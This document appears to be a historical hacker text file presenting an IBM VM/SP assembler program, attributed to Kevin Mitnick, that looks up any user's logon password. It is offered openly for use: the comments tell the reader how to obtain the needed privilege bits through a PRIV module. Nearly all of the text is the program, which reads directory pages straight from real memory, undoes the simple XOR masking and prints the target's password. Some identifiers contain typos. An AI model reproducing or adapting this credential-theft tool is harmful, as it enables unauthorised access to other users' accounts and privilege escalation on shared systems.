Looking Up IBM Passwords

by Kevin Mitnick

This program was written by Kevin Mitnick a few years ago.

It allows semi-privileged operators to snag passwords off the disk and decrypt them.

Ordinarily, only the username of DIRMAIN would be able to look-up passwords.  The program will work on CMS 3.0.

ibm-password.cms:

TITLE 'PW,<LOOKUP ANYONES CURRENT LOGON PASSWORD>,01,KDM' * MODIFICATION HISTORY: * UPDATE WHO WHEN DESCRIPTION * ;001 KDM 02/11/87 THE CREATION. * * PROGRAM DESCRIPTION: * TO SUCCESSFULLY EXECUTE THIS PROGRAM THE USER MUST HAVE * THE CLASS 'A' AND CLASS 'C' OR 'E' PRIVILEGE BITS. TO * GET AROUND THIS RESTRICTION, EXECUTE THE PRIV MODULE * TO SET THE REQUIRED PRIVILEGE BITS. YOU MUST HAVE THE * CLASS 'B' BIT TO EXECUTE THE PRIV MODULE. * * THIS PROGRAM WILL ALLOW YOU TO LOOKUP ANYONES PASSWORD. * THE PROGRAM STARTS OUT BY LOOKING AT THE PSA TO GET A * POINTER TO THE SYSLOCS INFORMATION, THE SYSLOCS INFOR- * MATION CONTAINS A POINTER TO DMKSYSPL WHICH IS THE VIRTUAL * LIST OF POINTERS TO THE VM/SP DIRECTORY. AFTER ALL THE * CURRENT POINTERS ARE OBTAINED THE PROGRAM WILL FIND THE * REAL ADDRESS OF EACH PAGE POINTER AND LOCK THAT PAGE INTO * REAL MEMORY. AFTER THE PAGE IS LOCKED THIS PROGRAM STEALS * THE PAGE AND STORES IT IN VIRTUAL MEMORY. THE USERID THAT * WAS SPECIFIED ON THE COMMAND LINE ALL BE ENCRYPTED. * * AFTER THE USERID IS MASKED THE PROGRAM WILL SEARCH THE * PAGE FOR A MATCH, IF THE USERID IS NOT FOUND THE PROGRAM * WILL CONTINUE RETRIEVING PAGES AND SEARCHING UNTIL ALL OF * THE PAGES IN THE VIRTUAL POINTER LIST HAVE BEEN CHECKED. * WHEN THE LIST IS EXHAUSTED A MESSAGE WILL BE PRINTED * INFORMING THE USER THAT IT'S NOT IN THE VM/SP DIRECTORY. * WHEN THERE IS A MATCH THE USERID AND PASSWORD WILL BE * DECRYPTED AND DISPLAYED ON THE TERMINAL. * * NOTES: * THE PAGE BUFFER AND THE ADDRESS OF THE VIRTUAL LIST OF * REAL ADDRESSES TO BE EXAMINED BY THE EXAMINE REAL * MEMORY DIAGNOSE MUST BE IN THE SAME PAGE OF VIRTUAL * STORAGE, THEREFORE, THIS PROGRAM RESERVES A PAGE OF * STORAGE AT X'0021000' FOR THOSE REQUIREMENTS. SEE SYSTEMS * PROGRAMMERS GUIDE FOR FURTHER INFORMATION. * *** UDIRBLOK - USER DIRECTORY CONTROL BLOCK * * 0 +-----------+-----------+-----------------+ * | UDIRRSV1 | UDIRDISP | UDIRDASD | * +-----------+-----------+-----------------+ * 8 | UDIRUSER | * +-----------------------------------------+ * 10 | UDIRPASS | * +-----------------------------------------+ * *** UDIRBLOK - USER DIRECTORY CONTROL BLOCK PRINT NOGEN ;DONT EXPAND MACROS. UDIRBLOK DSECT SPACE UDIRRSV1 DS 1H RESERVED FOR FUTURE USE UDIRDISP DS 1H DISPLACEMENT OF THE NEXT BLOCK UDIRDASD DS 1F DASD ADDRESS OF THE NEXT BLOCK UDIRUSER DS 1D USERID UDIRPASS DS 1D USER PASSWORD SPACE UDIRSIZE EQU (*-UDIRBLOK)/8 UDIRBLOK SIZE IN DOUBLEWORDS EJECT PW START X'2000' ; LOAD INTO CMS USER AREA. ENTRY PW ; ESTABLISH ENTRY POINT. STM R14,R12,12(R13) ; SAVE THE SUPERVISOR'S REGISTERS. LR R12,R15 ; MAKE REGISTER 12 OUR BASE. LA R11,4095(R12) ; INITIALIZE 2ND BASE REGISTER. LA R11,1(R11) ; ADD 1 TO MAKE IT A 4K. USING PW,R12,R11 ; ESTABLISH ADDRESSABILITY. ST R13,SAVERE6+4 ; STORE REGISTER 13 IN SAVE AREA. LA R13,SAVEREG ; SAVE OUR SAVE AREA ADDRESS. B SKIPCOPY ; BRANCH OVER THE COPYRIGHT NOTICE. SPACE DC CL8'PW' ' ; THE PROGRAMS NAME FOR THE COPYRIGHT NOTICE. DC C'COPYRIGHT 1987 KEVIN D. MITNICK' SPACE SKIPCOPY DS 0H CLI 8(R1),X'FF' ; USERID SPECIFIED ON COMMAND LINE? BNE GOTUSER ; YES. CONTINUE PROCESSING. * WRTERM '?INVALID FORMAT - FORMATE IS: PW <USERID>' B GETOUT ; EXIT PROGRAM. GOTUSER DS 0H MVC USERID,8(R1) ; SAVE USERID. XC USERID,MASK ; ENCRYPT USERID FOR SEARCH. BAL R14,GETPNUMS ; GET THE VIRTUAL PAGE POINTERS. LTR R15,R15 ; POINTER LOOKUP SUCCESSFUL? BNZ ERROR ; NOPE. EXIT PROGRAM. LA R10,DMKSYSPL ; POINT TO OUR VIRTUAL PTR LIST. NEXTPAGE DS 0H ICM R2,B'1111',0(R10) ; END OF VIRTUAL POINTER LIST? BM NOSUCH ; YES. USER NOT FOUND. LA R10,4(R10) ; BUMP TO NEXT VIRTUAL PAGE POINTER. SRL R2,4 ; SHIFT OFF 4 BITS TO ALIGN ON BYTE. ST R2,TEMPFW1 ; X'000E1000' -> X'0000E100' UNPK TEMPFW2(5),TEMPFW1+1(3) ; X'0000E100' -> X'F0F0FEF1' TR TEMPFW2,BIN2CHR ; FIX FULLWORD FOR CP LOCK CMD. MVC FIRSTPG1,TEMPFW2+1 ; MOVE FIRST PAGE # TO LOCK CMD. MVC LASTPG1,TEMPFW2+1 ; MOVE LAST PAGE # TO LOCK CMD. MVI RESPBUF,X'40' ; CLEAR THE RESPONSE BUFFER. MVC RESPBUF+1(129),RESPBUF LA R9,2 ; EXECUTE LOCK COMMAND TWICE. LCKAGAIN DS 0H LA R4,CPLOCK ; RX -> ADDRESS OF CP COMMAND. LA R5,RESPBUF ; RX+1 -> ADDRESS OF RESPONSE BUFFER. LA R6,23 ; RY -> LENGTH OF CP COMMAND. ICM R6,B'1000',=X'40' ; SET FLAG TO STORE RESP IN BUFFER. LA R7,130 ; RY+1 -> LENGTH OF RESPONSE BUFFER. DC X'83460008' ; VIRTUAL CONSOLE DIAGNOSE. BNZ DIAGERR ; SOMETHING WENT WRONG, ISSUE ERROR. LTR R6,R6 ; CHECK CP LOCK RETURN CODE. BNZ LOCKERR ; CP LOCK ERROR OCCURRED. BCT R9,LCKAGAIN ; DO IT TWICE TO MAKE SURE IT LOCKED LA R2,RESPBUF ; POINT TO THE RESPONSE BUFFER. MVC TMPREAL,25(R2) ; MOVE EBCDIC REAL ADDR TO TMP FIELD TR TMPREAL,CHR2BIN ; FIX FOR REAL MEMORY DIAGNOSE. PACK REALADDR(5),TMPREAL(9) MVC RADDRLST,REALADDR ; MOVE REAL ADDRESS TO VIRTUAL LIST. BAL R14,GETAPAGE ; GO READ IN THE PAGE. LTR R15,R15 ; WAS THE PAGE RETRIEVAL SUCCESSFUL? BNZ PAGEERR ; NOPE. NOTIFY USER. MVC FIRSTPG2,TEMPFW2+1 ; MOVE FIRST PAGE # TO UNLOCK CMD. MVC LASTPG2,TEMPFW2+1 ; MOVE LAST PAGE # TO UNLOCK CMD. LA R4,CPUNLOCK ; RX -> ADDRESS OF CP COMMAND. LA R5,RESPBUF ; RX+1 -> ADDRESS OF RESPONSE BUFFER LA R6,21 ; RY -> LENGTH OF CP COMMAND ICM R6,B'1000',=X'40' ; SET FLAG TO STORE RESP IN BUFFER LA R7,130 ; RY+1 -> LENGTH OF RESPONSE BUFFER DC X'83460008' ; EXECUTE VIRTUAL CONSOLE DIAGNOSE. BNZ DIAG8ERR ; COMMAND FAILED, INFORM THE USER. LTR R6,R6 ; CHECK CP LOCK RETURN CODE. BNZ UNLCKERR ; CP UNLOCK ERROR OCCURRED. LA R3,PAGEBUF ; POINT TO THE UDIRBLOKS. USING UDIRBLOK,R3 ; USE THE UDIRBLOK DSECT. LA R4,PAGEBUF ; GET THE START ADDRESS OF PAGEBUF. AH R4,UDIRDISP ; POINT TO THE LAST UDIRBLOK. NEXTUSER DS 0H CLC USERID,UDIRUSER ; IS THIS THE USERID? BE GOTCHA ; YEP. GET THE PASSWORD & PRINT IT. LA R3,UDIRSIZE*8(R3) ; BUMP R3 TO GET NEXT USERID. CLR R3,R4 ; ARE WE AT THE END OF THE PAGE. BH NEXTPAGE ; YEP. GO GET ANOTHER PAGE. B NEXTUSER ; KEEP ON CHECKING THE USERIDS. GOTCHA DS 0H MVC OUSERID,UDIRUSER ; MOVE OUT THE USERID. MVC OPASSWD,UDIRPASS ; MOVE OUT THE PASSWORD. XC OUSERID,MASK ; DECRYPT THE USERID. XC OPASSWD,MASK ; DECRYPT THE PASSWORD. WRTERM OUSRPWC,LUSRPWD ; WRITE OUT USERID & PASSWORD. B GETOUT ; ALL DONE, BETTER EXIT NOW. PAGEERR DS 0H WRTERM '?PAGE READ ERROR' B GETOUT ; EXIT PROGRAM. NOSUCH DS 0H WRTERM '?USERID IS NOT IN THE VM/SP DIRECTORY' B GETOUT ; EXIT PROGRAM. DIAG8ERR DS 0H WRTERM '?VIRTUAL CONSOLE DIAGNOSE FAILED' B GETOUT ; EXIT PROGRAM. LOCKERR DS 0H WRTERM '?CP LOCK ERROR OCCURRED' B GETOUT ; EXIT PROGRAM. UNLCKERR DS 0H WRTERM '?CP UNLOCK ERROR OCCURRED' B GETOUT ; EXIT PROGRAM. ERROR DS 0H WRTERM '?ERROR READING VIRTUAL PAGE POINTERS' B GETOUT ; EXIT PROGRAM. * * SUBROUTINE TO GET A COPY OF THE DMKSYSPL POINTERS * INTO OUR VIRTUAL MEMORY. * GETPNUMS DS 0H LA R2,PSA ; POINT ADDRESS OF SYSLOCS. LA R3,1 ; ONLY 1 ENTRY. LA R4,SYSLOCS ; STORE ADDR OF SYSLOCS HERE. DC X'83230004' ; PEEK AT REAL MEMORY. L R2,SYSLOCS ; MOVE REAL ADDR OF SYSLOCS TO R2. LA R2,56(R2) ; ADD OFFSET TO POINT TO DMKSYSPL. ST R2,PLPTR ; STORE THAT ADDRESS FOR DIAG. LA R2,PLPTR ; POINT TO THAT ADDRESS. LA R3,1 ; ONLY 1 ENTRY. LA R4,SYSPLPTR ; STORE ADDRESS OF 1ST PAGE POINTER. DC X'83230004' ; PEEK AT REAL MEMORY. LA R6,DNKSYSPL ; POINT TO OUR PAGE POINTERS LIST. LA R7,16 ; ALLOW UP TO 16 PAGE POINTERS. LOOP DS 0H LA R2,SYSPLPTR ; POINT TO 1ST VIRTUAL PAGE ADDRESS. LA R3,1 ; ONLY 1 ENTRY. LA R4,TEMPPL ; STORE PAGE ADDR IN HOLD AREA. DC X'83230004' ; PEEK AT REAL MEMORY. ICM R1,15,0(R4) ; IS THIS THE LAST VIRTUAL PAGE PTR? ST R1,0(R6) ; STORE ADDR OF PAGE IN OUR VIR LIST. LA R6,4(R6) ; BUMP POINTER TO NEXT FULLWORD. BM LASTONE ; YES. CONTINUE ON. L R2,SYSPLPTR ; GET OLD VIRTUAL PAGE POINTER ADDR. LA R2,4(R2) ; BUMP FULLWORD TO GET NEXT POINTER. ST R2,SYSPLPTR ; REPLACE FOR NEXT PEEK MEMORY DIAG. BCT R7,LOOP ; ALLOW FOR UP TO 16 TABLE ENTRIES. LA R15,16 ; SET RETURN CODE TO 16. WRTERM '?ERROR READING PAGE POINTERS' BR R14 LASTONE DS 0H LA R15,0 ; SET RETURN CODE TO 0 (SUCCESS). BR R14 ; RETURN TO CALLER. * GETAPAGE DS 0H LA R9,1020 ; GET 1020 FULLWORDS FROM REALADDR. LA R4,PAGEBUF ; POINT TO BEGINNING PAGE BUFFER. PEEKER DS 0H LA R2,RADDRLST ; POINT TO ADDRESS TO PEEK AT. LA R3,1 ; ONLY 1 ENTRY IN PEEK LIST. LA R4,0(R4) ; POINT TO THE PAGE BUFFER. DC X'83230004' ; EXAMINE REAL MEMORY. BNZ BADREAD ; PEEK FAILED, ISSUE ERROR MESSAGE. LA R4,4(R4) ; BUMP PAGE BUFFER ONE FULLWORD. L R2,RADDRLST ; GET LAST ADDRESS EXAMINED. LA R2,4(R2) ; INCREMENT BY A FULLWORD. ST R2,RADDRLST ; REPLACE IN VIRTUAL LIST. BCT 9,PEEKER ; GO PEEK AGAIN. LA R15,0 ; SET RETURN CODE TO 0 (SUCCESS). BR R14 ; RETURN TO CALLER. BADREAD DS 0H LA R15,16 ; SET RETURN CODE TO 16 (FATAL). BR R14 ; RETURN TO CALLER * * RESTORE CALLINGS PROGRAMS REGISTERS, SET THE CMS RETURN * CODE, AND EXIT THE PROGRAM. * GETOUT DS 0H L R13,SAVEREG+4 ; GET POINTER TO SAVED REGISTERS. LM R14,R12,12(R13) ; RESTORE THE CALLERS REGISTERS. XR R15,R15 ; SET RETURN CODE TO ZERO. BR R14 ; AND BACK TO THE CALLER WE GO. * * DEFINE CONSTANTS AND STORAGE SECTION. * CPLOCK DS 0D ; THIS COMMAND WILL CAUSE THE DC C'LOCK SYSTEM ' ; DESIRED VIRTUAL PAGE NUMBERS FIRSTPG1 DC CL3' ' ; TO BE LOCKED IN REAL STORAGE. DC C' ' DC C'MAP' * CPUNLOCK DS 0H ; THIS COMMAND WILL RELEASE PAGES DC C'UNLOCK SYSTEM ' ; LOCKED IN REAL STORAGE BY THIS FIRSTPG2 DC CL3' ' ; PROGRAM. DC C' ' LASTPG2 DC CL3' ' * BIN2CHR DS 0H ; BINARY TO CHARACTER TRANSLATION DC 256AL1(*-BIN2CHR) ; TABLE USED TO OBTAIN VIRTUAL ORG BIN2CHR+X'40' ; PAGE NUMBER FOR LOCK COMMAND. DC X'00' ORG BIN2CHR+X'FA' DC CL6'ABCDEF' ORG , * CHR2BIN DS 0H ; CHARACTER TO BINARY TRANSLATION DC 256AL1(*-CHR2BIN) ; TABLE, USED TO CONVERT INFO ORG CHR2BIN+X'C1' ; RECEIVED FROM CP LOCK COMMAND DC X'0A0B0C0D0E0F' ; TO AN ACTUAL FULLWORD ADDRESS. ORG , * DS 0F ; ALIGN ON A FULLWORD BOUNDARY. REALADDR DS CL4 ; WORK AREA TO OBTAIN REAL ADDRESS DS C ; FOR EXAMINE REAL STORAGE DIAS. * TMPREAL DS CL8 ; TEMP HOLD AREA WHILE FUDGING DS C ; BITS. * TEMPFW1 DS F ; TEMP HOLD AREA FOR A FULLWORD. * TEMPFW2 DS F ; TEMP HOLD AREA FOR A FULLWORD. DS C ; WORK BYTE FOR UNPK INSTRUCTION. * MASK DC 8X'AA' ; MASK FOR PASSWORD ENCRYPTION. USERID DC CL8' ' ; CMS USERID HOLD AREA. SYSLOCS DS F ; ADDRESS OF SYSLOCS INFORMATION. SYSPLPTR DS F ; FIRST VIRTUAL PAGE POINTER. PLPTR DS F ; POINTER TO DMKSYSPL. TEMPPL DS F ; HOLDING AREA FOR DMKSYSPL PTRS. PSA DC XL4'000003A8' ; REAL ADDRESS FOR SYSLOCS INFO. DMKSYSPL DS 16F ; 16 FULLWORDS OF X'00'. RESPBUF DS CL130' ' ; RESPONSE BUFFER FOR CP LOCK CMDS. * OUSRPWD DS 0H ; USERID AND PASSWORD OUTPUT LINE. DC C'%USERID: ' OUSERID DC CL8' ' ; DECRYPTED USERID GOES HERE. DC C' PASSWORD: ' OPASSWD DC CL8' ' ; DECRYPTED PASSWORD GOES HERE. LUSRPWD EQU *-OUSRPWD ; LENGTH OF PASSWORD DISPLAY MESSAGE * SAVEREG DS 18F ; AREA TO SAVE CALLERS REGISTERS. * ORG PW+4096 ; RESET ON A PAGE BOUNDARY. * RADDRLST DS F ; REAL PAGE POINTER ADDRESS LIST. PAGEBUF DS 4080X ; PAGE BUFFER = (4K - 2D) ORG , ; RESET LOCATION COUNTER. LTORG ; LITERAL POOL STARTS HERE. REGEQU ; SET UP REGISTER EQUATES. * END ; AND THAT'S ALL FOLKS.

Code: ibm-password.cms